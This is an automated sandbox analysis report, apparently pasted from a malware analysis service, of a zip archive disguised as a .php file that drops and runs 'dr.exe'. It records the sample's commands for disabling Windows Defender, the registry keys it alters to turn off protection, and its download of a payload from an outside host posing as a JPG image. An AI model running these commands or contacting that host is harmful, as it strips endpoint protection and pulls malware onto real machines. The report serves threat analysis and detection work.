Zips_7001f9ada4c0f5e8e47ac3696f190d31_php_2019-06-26_21_30.json
  1.  
  2. [*] MalFamily: ""
  3.  
  4. [*] MalScore: 10.0
  5.  
  6. [*] File Name: "Zips_7001f9ada4c0f5e8e47ac3696f190d31.php"
  7. [*] File Size: 87059
  8. [*] File Type: "Zip archive data, at least v2.0 to extract"
  9. [*] SHA256: "d547f50711ff9602d75c9f0eb8d8fce09340e899cc8ec74820a28efea1ba232e"
  10. [*] MD5: "7001f9ada4c0f5e8e47ac3696f190d31"
  11. [*] SHA1: "a397ea3a1d0c3e33e849a87d3afff7c2634ee821"
  12. [*] SHA512: "232a9b298a27f0ef2d40308ad6b20fe14c69e10bac6caa345abcee94d53c40fa11310e443e9b682345c3ed46ff2fd1da6387ace1a7207c058fe108685ce3912e"
  13. [*] CRC32: "42382ED5"
  14. [*] SSDEEP: "1536:u12AQGX237sfjwKI5dCMsnzwemn+rPtx8tuEuLQEoF5hHA/JMY2:uwAQB34X6dCVz4+jD8tuEusEoFhY2"
  15.  
  16. [*] Process Execution: [
  17. "wscript.exe",
  18. "dr.exe",
  19. "cmd.exe",
  20. "powershell.exe",
  21. "cmd.exe",
  22. "sc.exe",
  23. "cmd.exe",
  24. "sc.exe",
  25. "cmd.exe",
  26. "sc.exe",
  27. "cmd.exe",
  28. "sc.exe",
  29. "cmd.exe",
  30. "powershell.exe",
  31. "svchost.exe",
  32. "services.exe",
  33. "lsass.exe"
  34. ]
  35.  
  36. [*] Signatures Detected: [
  37. {
  38. "Description": "Attempts to connect to a dead IP:Port (1 unique times)",
  39. "Details": [
  40. {
  41. "IP": "185.94.230.114:80"
  42. }
  43. ]
  44. },
  45. {
  46. "Description": "Creates RWX memory",
  47. "Details": []
  48. },
  49. {
  50. "Description": "Possible date expiration check, exits too soon after checking local time",
  51. "Details": [
  52. {
  53. "process": "cmd.exe, PID 2844"
  54. }
  55. ]
  56. },
  57. {
  58. "Description": "A process created a hidden window",
  59. "Details": [
  60. {
  61. "Process": "dr.exe -> cmd"
  62. },
  63. {
  64. "Process": "dr.exe -> cmd"
  65. },
  66. {
  67. "Process": "dr.exe -> cmd"
  68. }
  69. ]
  70. },
  71. {
  72. "Description": "Drops a binary and executes it",
  73. "Details": [
  74. {
  75. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\dr.exe"
  76. }
  77. ]
  78. },
  79. {
  80. "Description": "Performs some HTTP requests",
  81. "Details": [
  82. {
  83. "url": "http://bootiky.com/Dree9238.JPG"
  84. }
  85. ]
  86. },
  87. {
  88. "Description": "Attempts to stop active services",
  89. "Details": [
  90. {
  91. "servicename": "WinDefend"
  92. }
  93. ]
  94. },
  95. {
  96. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  97. "Details": [
  98. {
  99. "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 12269276 times"
  100. }
  101. ]
  102. },
  103. {
  104. "Description": "Spoofs its process name and/or associated pathname to appear as a legitimate process",
  105. "Details": [
  106. {
  107. "modified_name": "svchost.exe",
  108. "modified_path": "C:\\Users\\user\\AppData\\Local\\Temp\\dr.exe",
  109. "original_name": "svchost.exe",
  110. "original_path": "C:\\Windows\\system32\\svchost.exe"
  111. }
  112. ]
  113. },
  114. {
  115. "Description": "Creates a hidden or system file",
  116. "Details": [
  117. {
  118. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF1177b3d.TMP"
  119. }
  120. ]
  121. },
  122. {
  123. "Description": "Attempts to disable Windows Defender",
  124. "Details": []
  125. }
  126. ]
  127.  
  128. [*] Started Service: [
  129. "KeyIso"
  130. ]
  131.  
  132. [*] Executed Commands: [
  133. "C:\\Users\\user\\AppData\\Local\\Temp\\dr.exe",
  134. "\"C:\\Windows\\System32\\cmd.exe\" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
  135. "cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
  136. "\"C:\\Windows\\System32\\cmd.exe\" /c sc stop WinDefend",
  137. "cmd /c sc stop WinDefend",
  138. "\"C:\\Windows\\System32\\cmd.exe\" /c sc delete WinDefend",
  139. "cmd /c sc delete WinDefend",
  140. "C:\\Windows\\system32\\cmd.exe /c sc stop WinDefend",
  141. "C:\\Windows\\system32\\cmd.exe /c sc delete WinDefend",
  142. "C:\\Windows\\system32\\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
  143. "C:\\Windows\\system32\\svchost.exe",
  144. "powershell Set-MpPreference -DisableRealtimeMonitoring $true",
  145. "sc stop WinDefend",
  146. "sc delete WinDefend",
  147. "C:\\Windows\\system32\\lsass.exe"
  148. ]
  149.  
  150. [*] Mutexes: [
  151. "Local\\ZoneAttributeCacheCounterMutex",
  152. "Local\\ZonesCacheCounterMutex",
  153. "Local\\ZonesLockedCacheCounterMutex",
  154. "Global\\CLR_CASOFF_MUTEX",
  155. "Global\\838B6C9EB27932960"
  156. ]
  157.  
  158. [*] Modified Files: [
  159. "C:\\Users\\user\\AppData\\Local\\Temp\\dr.exe",
  160. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-0000000000-0000000000-0000000000-1000\\00000000-0000-0000-0000-000000000000b_00000000-0000-0000-0000-000000000000",
  161. "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
  162. "\\??\\PIPE\\srvsvc",
  163. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\ZGSK3B76JGB4GHOI3R9H.temp",
  164. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF1177b3d.TMP",
  165. "C:\\Windows\\SysWOW64\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
  166. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\ODR9CMABFFET44BNUZ9Q.temp",
  167. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms"
  168. ]
  169.  
  170. [*] Deleted Files: [
  171. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF1177b3d.TMP",
  172. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.1548.18328859",
  173. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1548.18328859",
  174. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.1548.18328859",
  175. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\ODR9CMABFFET44BNUZ9Q.temp",
  176. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2260.18349640",
  177. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2260.18349640",
  178. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2260.18349656"
  179. ]
  180.  
  181. [*] Modified Registry Keys: [
  182. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
  183. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
  184. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender",
  185. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware",
  186. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection",
  187. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring",
  188. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnAccessProtection",
  189. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnRealtimeEnable",
  190. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableIOAVProtection",
  191. "DisableNotifications",
  192. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList"
  193. ]
  194.  
  195. [*] Deleted Registry Keys: [
  196. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  197. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  198. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
  199. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
  200. ]
  201.  
  202. [*] DNS Communications: [
  203. {
  204. "type": "A",
  205. "request": "bootiky.com",
  206. "answers": [
  207. {
  208. "data": "185.94.230.114",
  209. "type": "A"
  210. }
  211. ]
  212. }
  213. ]
  214.  
  215. [*] Domains: [
  216. {
  217. "ip": "185.94.230.114",
  218. "domain": "bootiky.com"
  219. }
  220. ]
  221.  
  222. [*] Network Communication - ICMP: []
  223.  
  224. [*] Network Communication - HTTP: [
  225. {
  226. "count": 1,
  227. "body": "",
  228. "uri": "http://bootiky.com/Dree9238.JPG",
  229. "user-agent": "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)",
  230. "method": "GET",
  231. "host": "bootiky.com",
  232. "version": "1.1",
  233. "path": "/Dree9238.JPG",
  234. "data": "GET /Dree9238.JPG HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: bootiky.com\r\n\r\n",
  235. "port": 80
  236. }
  237. ]
  238.  
  239. [*] Network Communication - SMTP: []
  240.  
  241. [*] Network Communication - Hosts: []
  242.  
  243. [*] Network Communication - IRC: []
  244.  
  245. [*] Static Analysis: {
  246. "office": {
  247. "Metadata": {
  248. "HasMacros": "No"
  249. }
  250. }
  251. }
  252.  
  253. [*] Resolved APIs: [
  254. "advapi32.dll.SaferIdentifyLevel",
  255. "advapi32.dll.SaferComputeTokenFromLevel",
  256. "advapi32.dll.SaferCloseLevel",
  257. "ole32.dll.CLSIDFromProgIDEx",
  258. "ole32.dll.CoGetClassObject",
  259. "wscript.exe.#1",
  260. "urlmon.dll.#326",
  261. "urlmon.dll.#327",
  262. "shell32.dll.#685",
  263. "shell32.dll.#688",
  264. "urlmon.dll.#395",
  265. "cryptsp.dll.CryptAcquireContextW",
  266. "cryptsp.dll.CryptGenRandom",
  267. "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
  268. "winhttp.dll.WinHttpCheckPlatform",
  269. "winhttp.dll.WinHttpOpen",
  270. "winhttp.dll.WinHttpConnect",
  271. "winhttp.dll.WinHttpOpenRequest",
  272. "winhttp.dll.WinHttpCloseHandle",
  273. "winhttp.dll.WinHttpSendRequest",
  274. "winhttp.dll.WinHttpReceiveResponse",
  275. "winhttp.dll.WinHttpAddRequestHeaders",
  276. "winhttp.dll.WinHttpQueryHeaders",
  277. "winhttp.dll.WinHttpReadData",
  278. "winhttp.dll.WinHttpWriteData",
  279. "winhttp.dll.WinHttpQueryDataAvailable",
  280. "winhttp.dll.WinHttpQueryOption",
  281. "winhttp.dll.WinHttpSetOption",
  282. "winhttp.dll.WinHttpSetTimeouts",
  283. "winhttp.dll.WinHttpCrackUrl",
  284. "winhttp.dll.WinHttpCreateUrl",
  285. "oleaut32.dll.#8",
  286. "oleaut32.dll.#12",
  287. "shlwapi.dll.StrRChrA",
  288. "shlwapi.dll.StrCmpNW",
  289. "oleaut32.dll.#4",
  290. "oleaut32.dll.#6",
  291. "kernel32.dll.RegQueryValueExW",
  292. "oleaut32.dll.#2",
  293. "kernel32.dll.RegCloseKey",
  294. "oleaut32.dll.#9",
  295. "ws2_32.dll.GetAddrInfoW",
  296. "ws2_32.dll.WSASocketW",
  297. "ws2_32.dll.#2",
  298. "ws2_32.dll.#21",
  299. "ws2_32.dll.#9",
  300. "ws2_32.dll.WSAIoctl",
  301. "ws2_32.dll.FreeAddrInfoW",
  302. "ws2_32.dll.#6",
  303. "ws2_32.dll.#5",
  304. "ws2_32.dll.WSARecv",
  305. "ws2_32.dll.WSASend",
  306. "ole32.dll.CreateStreamOnHGlobal",
  307. "oleaut32.dll.#411",
  308. "oleaut32.dll.#23",
  309. "oleaut32.dll.#24",
  310. "ole32.dll.GetHGlobalFromStream",
  311. "rpcrt4.dll.RpcBindingFree",
  312. "oleaut32.dll.#500",
  313. "cryptsp.dll.CryptReleaseContext",
  314. "cryptsp.dll.CryptAcquireContextA",
  315. "kernel32.dll.VirtualAlloc",
  316. "ntdll.dll.memcpy",
  317. "kernel32.dll.GetCurrentProcess",
  318. "kernel32.dll.CloseHandle",
  319. "advapi32.dll.OpenProcessToken",
  320. "advapi32.dll.GetTokenInformation",
  321. "kernel32.dll.Wow64EnableWow64FsRedirection",
  322. "advapi32.dll.RegCloseKey",
  323. "advapi32.dll.RegCreateKeyW",
  324. "advapi32.dll.RegOpenKeyExW",
  325. "advapi32.dll.RegSetValueExW",
  326. "shell32.dll.ShellExecuteA",
  327. "ole32.dll.OleInitialize",
  328. "cryptbase.dll.SystemFunction036",
  329. "ole32.dll.CreateBindCtx",
  330. "ole32.dll.CoTaskMemAlloc",
  331. "propsys.dll.PSCreateMemoryPropertyStore",
  332. "propsys.dll.PSPropertyBag_WriteDWORD",
  333. "ole32.dll.CoGetApartmentType",
  334. "ole32.dll.CoRegisterInitializeSpy",
  335. "ole32.dll.CoTaskMemFree",
  336. "comctl32.dll.#236",
  337. "ole32.dll.CoGetMalloc",
  338. "propsys.dll.PSPropertyBag_ReadDWORD",
  339. "propsys.dll.PSPropertyBag_ReadGUID",
  340. "comctl32.dll.#320",
  341. "comctl32.dll.#324",
  342. "comctl32.dll.#323",
  343. "advapi32.dll.RegEnumKeyW",
  344. "advapi32.dll.OpenThreadToken",
  345. "ole32.dll.StringFromGUID2",
  346. "apphelp.dll.ApphelpCheckShellObject",
  347. "ole32.dll.CoCreateInstance",
  348. "urlmon.dll.CreateUri",
  349. "kernel32.dll.InitializeSRWLock",
  350. "kernel32.dll.AcquireSRWLockExclusive",
  351. "kernel32.dll.AcquireSRWLockShared",
  352. "kernel32.dll.ReleaseSRWLockExclusive",
  353. "kernel32.dll.ReleaseSRWLockShared",
  354. "comctl32.dll.#328",
  355. "comctl32.dll.#334",
  356. "shell32.dll.#102",
  357. "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
  358. "propsys.dll.PSPropertyBag_ReadStrAlloc",
  359. "ole32.dll.CoInitializeEx",
  360. "advapi32.dll.InitializeSecurityDescriptor",
  361. "advapi32.dll.SetEntriesInAclW",
  362. "ntmarta.dll.GetMartaExtensionInterface",
  363. "advapi32.dll.SetSecurityDescriptorDacl",
  364. "advapi32.dll.IsTextUnicode",
  365. "comctl32.dll.#332",
  366. "comctl32.dll.#338",
  367. "comctl32.dll.#339",
  368. "ole32.dll.CoUninitialize",
  369. "sechost.dll.ConvertSidToStringSidW",
  370. "profapi.dll.#104",
  371. "propsys.dll.#430",
  372. "advapi32.dll.RegGetValueW",
  373. "ole32.dll.CoTaskMemRealloc",
  374. "propsys.dll.InitPropVariantFromStringAsVector",
  375. "propsys.dll.PSCoerceToCanonicalValue",
  376. "setupapi.dll.CM_Get_Device_Interface_List_ExW",
  377. "propsys.dll.PropVariantToStringAlloc",
  378. "ole32.dll.PropVariantClear",
  379. "ole32.dll.CoAllowSetForegroundWindow",
  380. "comctl32.dll.#386",
  381. "shell32.dll.SHGetFolderPathW",
  382. "advapi32.dll.SaferGetPolicyInformation",
  383. "ntdll.dll.RtlDllShutdownInProgress",
  384. "comctl32.dll.#329",
  385. "ole32.dll.OleUninitialize",
  386. "ole32.dll.CoRevokeInitializeSpy",
  387. "comctl32.dll.#388",
  388. "advapi32.dll.CryptAcquireContextA",
  389. "advapi32.dll.CryptImportKey",
  390. "advapi32.dll.CryptEncrypt",
  391. "cryptsp.dll.CryptImportKey",
  392. "cryptbase.dll.SystemFunction040",
  393. "cryptbase.dll.SystemFunction041",
  394. "cryptsp.dll.CryptEncrypt",
  395. "advapi32.dll.UnregisterTraceGuids",
  396. "comctl32.dll.#321",
  397. "kernel32.dll.SetThreadUILanguage",
  398. "kernel32.dll.CopyFileExW",
  399. "kernel32.dll.IsDebuggerPresent",
  400. "kernel32.dll.SetConsoleInputExeNameW",
  401. "kernel32.dll.SortGetHandle",
  402. "kernel32.dll.SortCloseHandle",
  403. "uxtheme.dll.ThemeInitApiHook",
  404. "user32.dll.IsProcessDPIAware",
  405. "shell32.dll.#66",
  406. "comctl32.dll.#385",
  407. "comctl32.dll.#336",
  408. "comctl32.dll.#333",
  409. "linkinfo.dll.IsValidLinkInfo",
  410. "propsys.dll.#417",
  411. "propsys.dll.PSGetNameFromPropertyKey",
  412. "propsys.dll.PSStringFromPropertyKey",
  413. "propsys.dll.InitVariantFromBuffer",
  414. "propsys.dll.PropVariantToGUID",
  415. "linkinfo.dll.CreateLinkInfoW",
  416. "user32.dll.IsCharAlphaW",
  417. "user32.dll.CharPrevW",
  418. "ntshrui.dll.GetNetResourceFromLocalPathW",
  419. "srvcli.dll.NetShareEnum",
  420. "cscapi.dll.CscNetApiGetInterface",
  421. "slc.dll.SLGetWindowsInformationDWORD",
  422. "shlwapi.dll.PathRemoveFileSpecW",
  423. "linkinfo.dll.DestroyLinkInfo",
  424. "propsys.dll.PropVariantToBoolean",
  425. "advapi32.dll.GetSecurityInfo",
  426. "advapi32.dll.SetSecurityInfo",
  427. "advapi32.dll.GetSecurityDescriptorControl",
  428. "advapi32.dll.RegQueryInfoKeyW",
  429. "advapi32.dll.RegEnumKeyExW",
  430. "advapi32.dll.RegEnumValueW",
  431. "advapi32.dll.RegQueryValueExW",
  432. "shlwapi.dll.UrlIsW",
  433. "kernel32.dll.InitializeCriticalSectionAndSpinCount",
  434. "msvcrt.dll._set_error_mode",
  435. "msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z",
  436. "kernel32.dll.FindActCtxSectionStringW",
  437. "kernel32.dll.GetSystemWindowsDirectoryW",
  438. "mscoree.dll.GetProcessExecutableHeap",
  439. "mscorwks.dll.DllGetClassObjectInternal",
  440. "mscorwks.dll.GetCLRFunction",
  441. "advapi32.dll.RegisterTraceGuidsW",
  442. "advapi32.dll.GetTraceLoggerHandle",
  443. "advapi32.dll.GetTraceEnableLevel",
  444. "advapi32.dll.GetTraceEnableFlags",
  445. "advapi32.dll.TraceEvent",
  446. "mscoree.dll.IEE",
  447. "mscorwks.dll.IEE",
  448. "mscoree.dll.GetStartupFlags",
  449. "mscoree.dll.GetHostConfigurationFile",
  450. "mscoree.dll.GetCORSystemDirectory",
  451. "ntdll.dll.RtlVirtualUnwind",
  452. "kernel32.dll.IsWow64Process",
  453. "advapi32.dll.AllocateAndInitializeSid",
  454. "advapi32.dll.InitializeAcl",
  455. "advapi32.dll.AddAccessAllowedAce",
  456. "advapi32.dll.FreeSid",
  457. "kernel32.dll.SetThreadStackGuarantee",
  458. "kernel32.dll.FlsSetValue",
  459. "kernel32.dll.FlsGetValue",
  460. "kernel32.dll.FlsAlloc",
  461. "kernel32.dll.FlsFree",
  462. "kernel32.dll.AddVectoredContinueHandler",
  463. "kernel32.dll.RemoveVectoredContinueHandler",
  464. "advapi32.dll.ConvertSidToStringSidW",
  465. "kernel32.dll.FlushProcessWriteBuffers",
  466. "kernel32.dll.GetWriteWatch",
  467. "kernel32.dll.ResetWriteWatch",
  468. "kernel32.dll.CreateMemoryResourceNotification",
  469. "kernel32.dll.QueryMemoryResourceNotification",
  470. "kernel32.dll.GlobalMemoryStatusEx",
  471. "ole32.dll.CoGetContextToken",
  472. "oleaut32.dll.#149",
  473. "kernel32.dll.GetUserDefaultUILanguage",
  474. "kernel32.dll.GetVersionExW",
  475. "kernel32.dll.GetFullPathNameW",
  476. "kernel32.dll.SetErrorMode",
  477. "kernel32.dll.GetFileAttributesExW",
  478. "version.dll.GetFileVersionInfoSizeW",
  479. "version.dll.GetFileVersionInfoW",
  480. "version.dll.VerQueryValueW",
  481. "kernel32.dll.lstrlen",
  482. "kernel32.dll.lstrlenW",
  483. "mscoree.dll.ND_RI2",
  484. "kernel32.dll.lstrcpy",
  485. "kernel32.dll.lstrcpyW",
  486. "version.dll.VerLanguageNameW",
  487. "kernel32.dll.GetCurrentProcessId",
  488. "advapi32.dll.LookupPrivilegeValueW",
  489. "advapi32.dll.AdjustTokenPrivileges",
  490. "kernel32.dll.OpenProcess",
  491. "psapi.dll.EnumProcessModules",
  492. "psapi.dll.GetModuleInformation",
  493. "psapi.dll.GetModuleBaseNameW",
  494. "psapi.dll.GetModuleFileNameExW",
  495. "kernel32.dll.GetExitCodeProcess",
  496. "ntdll.dll.NtQuerySystemInformation",
  497. "user32.dll.EnumWindows",
  498. "user32.dll.GetWindowThreadProcessId",
  499. "kernel32.dll.WerSetFlags",
  500. "kernel32.dll.SetThreadPreferredUILanguages",
  501. "kernel32.dll.GetThreadPreferredUILanguages",
  502. "kernel32.dll.GetUserDefaultLocaleName",
  503. "kernel32.dll.GetEnvironmentVariableW",
  504. "advapi32.dll.CryptReleaseContext",
  505. "advapi32.dll.CryptCreateHash",
  506. "advapi32.dll.CryptDestroyHash",
  507. "advapi32.dll.CryptHashData",
  508. "advapi32.dll.CryptGetHashParam",
  509. "advapi32.dll.CryptExportKey",
  510. "advapi32.dll.CryptGenKey",
  511. "advapi32.dll.CryptGetKeyParam",
  512. "advapi32.dll.CryptDestroyKey",
  513. "advapi32.dll.CryptVerifySignatureA",
  514. "advapi32.dll.CryptSignHashA",
  515. "advapi32.dll.CryptGetProvParam",
  516. "advapi32.dll.CryptGetUserKey",
  517. "advapi32.dll.CryptEnumProvidersA",
  518. "cryptsp.dll.CryptHashData",
  519. "cryptsp.dll.CryptGetHashParam",
  520. "cryptsp.dll.CryptDestroyHash",
  521. "cryptsp.dll.CryptDestroyKey",
  522. "mscoree.dll.GetTokenForVTableEntry",
  523. "mscoree.dll.SetTargetForVTableEntry",
  524. "mscoree.dll.GetTargetForVTableEntry",
  525. "culture.dll.ConvertLangIdToCultureName",
  526. "ole32.dll.CoCreateGuid",
  527. "kernel32.dll.CreateFileW",
  528. "kernel32.dll.GetConsoleScreenBufferInfo",
  529. "kernel32.dll.LocalFree",
  530. "kernel32.dll.LocalAlloc",
  531. "mscoree.dll.ND_RI4",
  532. "advapi32.dll.DuplicateTokenEx",
  533. "advapi32.dll.CheckTokenMembership",
  534. "kernel32.dll.GetConsoleTitleW",
  535. "mscorjit.dll.getJit",
  536. "kernel32.dll.SetConsoleTitleW",
  537. "kernel32.dll.SetConsoleCtrlHandler",
  538. "kernel32.dll.CreateEventW",
  539. "ntdll.dll.WinSqmIsOptedIn",
  540. "kernel32.dll.ExpandEnvironmentStringsW",
  541. "shfolder.dll.SHGetFolderPathW",
  542. "kernel32.dll.SetEnvironmentVariableW",
  543. "kernel32.dll.GetACP",
  544. "kernel32.dll.UnmapViewOfFile",
  545. "kernel32.dll.GetFileType",
  546. "kernel32.dll.ReadFile",
  547. "kernel32.dll.GetSystemInfo",
  548. "kernel32.dll.VirtualQuery",
  549. "secur32.dll.GetUserNameExW",
  550. "advapi32.dll.GetUserNameW",
  551. "kernel32.dll.ReleaseMutex",
  552. "advapi32.dll.RegisterEventSourceW",
  553. "advapi32.dll.DeregisterEventSource",
  554. "advapi32.dll.ReportEventW",
  555. "kernel32.dll.GetLogicalDrives",
  556. "kernel32.dll.GetDriveTypeW",
  557. "kernel32.dll.GetVolumeInformationW",
  558. "kernel32.dll.GetCurrentDirectoryW",
  559. "kernel32.dll.GetLastError",
  560. "kernel32.dll.GetStdHandle",
  561. "kernel32.dll.GetConsoleMode",
  562. "kernel32.dll.SetEvent",
  563. "kernel32.dll.FindFirstFileW",
  564. "kernel32.dll.FindClose",
  565. "mscoree.dll.DllGetClassObject",
  566. "diasymreader.dll.DllGetClassObjectInternal",
  567. "kernel32.dll.GetConsoleOutputCP",
  568. "gdi32.dll.TranslateCharsetInfo",
  569. "kernel32.dll.SetConsoleTextAttribute",
  570. "kernel32.dll.WriteConsoleW",
  571. "mscoree.dll.CorExitProcess",
  572. "mscorwks.dll.CorExitProcess",
  573. "mscorwks.dll._CorDllMain",
  574. "kernel32.dll.CreateActCtxW",
  575. "kernel32.dll.AddRefActCtx",
  576. "kernel32.dll.ReleaseActCtx",
  577. "kernel32.dll.ActivateActCtx",
  578. "kernel32.dll.DeactivateActCtx",
  579. "kernel32.dll.GetCurrentActCtx",
  580. "kernel32.dll.QueryActCtxW",
  581. "netutils.dll.NetApiBufferFree",
  582. "kernel32.dll.IsProcessorFeaturePresent",
  583. "ntdll.dll.RtlUnwind",
  584. "mscoree.dll._CorExeMain",
  585. "mscoree.dll._CorImageUnloading",
  586. "mscoree.dll._CorValidateImage",
  587. "cryptsp.dll.CryptExportKey",
  588. "cryptsp.dll.CryptCreateHash",
  589. "kernel32.dll.SwitchToThread",
  590. "rpcrt4.dll.UuidFromStringW",
  591. "rpcrt4.dll.RpcBindingCreateW",
  592. "rpcrt4.dll.RpcBindingBind",
  593. "sechost.dll.OpenSCManagerW",
  594. "sechost.dll.OpenServiceW",
  595. "sechost.dll.StartServiceW",
  596. "sechost.dll.CloseServiceHandle"
  597. ]
  598.  
  599. [*] Static Analysis: {
  600. "office": {
  601. "Metadata": {
  602. "HasMacros": "No"
  603. }
  604. }
  605. }